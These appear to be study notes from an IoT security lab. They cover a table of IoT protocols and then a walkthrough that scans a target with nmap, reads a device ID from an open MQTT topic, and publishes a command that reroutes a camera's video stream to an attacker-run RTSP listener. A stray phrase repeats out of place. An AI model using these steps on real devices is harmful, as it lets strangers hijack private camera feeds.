IoT protocols

|Protocol | Communication Method | Description | |———|———————-|————–| |MQTT (Message Queuing Telemetry Transport)| Middleware | A lightweight protocol that relies on a publish/subscribe model to send or receive messages.| |CoAP (Constrained Application Protocol)| Middleware| Translates HTTP communication to a usable communication medium for lightweight devices.| |AMQP (Advanced Message Queuing Protocol)| Middleware| Acts as a transactional protocol to receive, queue, and store messages/payloads between devices.| |DDS (Data Distribution Service| Middleware | A scalable protocol that relies on a publish/subscribe model to send or receive messages. | |HTTP (Hypertext Transfer Protocol)| Device-to-Device| Used as a communication method from traditional devices to lightweight devices or for large data communication.| |WebSocket | Device-to-Device | Relies on a client-server model to send data over a TCP connection.|


The mqtt is a messages protocol using publish subscribe model. Check entropy of binary

to overcome the problem of different types of data and multiple publisher the publish/subscribe model uses topics:

Check entropy of binary Check entropy of binary

An MQTT broker assigns all devices connected to it read/write access to all topics; that is, any device can publish and subscribe to a topic. MQTT, a device ID is commonly exchanged by publishing a message containing the device ID to a pre-known topic that anyone can subscribe to.


  • Paho Paho is a python library that offers support for all features of MQTT.
  • Mosquitto is a suite of MQTT utilities that include a broker and publish/subscribe clients that we can use from the command line.

Command to subscribe to topic “device/thm” on broker behind example.thm: mosquitto_sub -h example.thm -t device/thm

Nmap script scanning

Nmap script scan of all ports nmap -sC -sV -p- <Target IP> -vv --min-rate 1500


We want to send a message to “device/{deviceID}/cmd topic which configure the camera to stream its content to our own rtsp listener. To get the deviceID we can listen to the “device/init” topic.

We first run Nmap script scan to find out there is mosquitto running on the target with the topic: device/init We then subscribe to it: mosquitto_sub -h -t device/init

We start a rtsp listener server via: docker run --rm -it --network=host aler9/rtsp-simple-server

We send this message to the MQTT mosquitto_pub -h -t device/R1MM6C0Z4TXJLT96H5T2/cmd -m "{"cmd":10,"url":"rtsp://"}"

Via vlc rtsp:// we see that we actually rerouted the video feed to our listener.
